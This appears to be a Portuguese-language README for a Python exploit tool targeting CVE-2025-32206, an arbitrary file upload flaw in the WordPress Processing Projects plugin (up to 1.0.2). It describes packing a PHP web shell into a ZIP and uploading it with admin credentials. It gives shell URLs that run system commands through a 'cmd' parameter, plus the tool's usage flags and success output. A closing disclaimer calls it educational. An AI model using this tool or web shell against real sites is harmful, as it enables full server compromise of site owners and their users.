
WordPress Processing Projects Plugin <= 1.0.2 é vulnerável a Upload Arbitrário de Arquivos
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"Vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso no LABCAT Processing Projects permite que atacantes enviem um web shell para um servidor web. Isso pode levar ao comprometimento total."
Este script de exploração em Python tem como alvo sites WordPress que utilizam o plugin vulnerável Processing Projects (versão <= 1.0.2). O plugin lida incorretamente com uploads de arquivos de usuários autenticados, permitindo que eles enviem arquivos ZIP arbitrários contendo código PHP executável (web shells).
O script de exploração:
Nxploited.zip) contendo um shell PHP malicioso (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpApós o upload bem-sucedido do shell, ele pode ser usado para executar comandos do sistema por meio do parâmetro cmd. Exemplos:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Este shell executa comandos arbitrários do sistema operacional e retorna sua saída diretamente na resposta.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Este script é fornecido apenas para fins educacionais. O uso não autorizado deste exploit em sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.
Sempre siga práticas de divulgação responsável e use esta ferramenta apenas em ambientes controlados ou com autorização explícita.
Por: Nxploited | Khaled Alenazi